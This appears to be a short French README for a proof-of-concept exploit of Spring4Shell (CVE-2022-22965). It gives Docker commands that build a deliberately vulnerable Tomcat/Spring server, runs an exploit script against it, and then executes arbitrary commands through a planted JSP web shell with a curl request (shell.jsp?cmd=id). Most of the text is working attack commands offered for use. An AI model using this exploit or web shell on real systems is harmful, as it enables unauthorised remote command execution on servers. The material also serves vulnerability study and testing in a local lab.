
PoC et exploit pour CVE-2022-22965 Spring4Shell
Spring4Shell (CVE-2022-22965) Preuve de concept avec un serveur Tomcat vulnérable contenant une application spring4shell vulnérable.
docker build . -t spring4shell
docker run -p 80:8080 spring4shell
Vous pouvez également l'exécuter avec le port du débogueur exposé si nécessaire :
docker run -p 80:8080 –p 5005:5005 spring4shell
Consultez l'article de blog original pour les détails de configuration d'un débogueur distant dans IntelliJ Idea !
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell
Ensuite, vous pouvez exécuter n'importe quelle commande à distance comme ceci :
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -
...ou en visitant l'URL ci-dessus.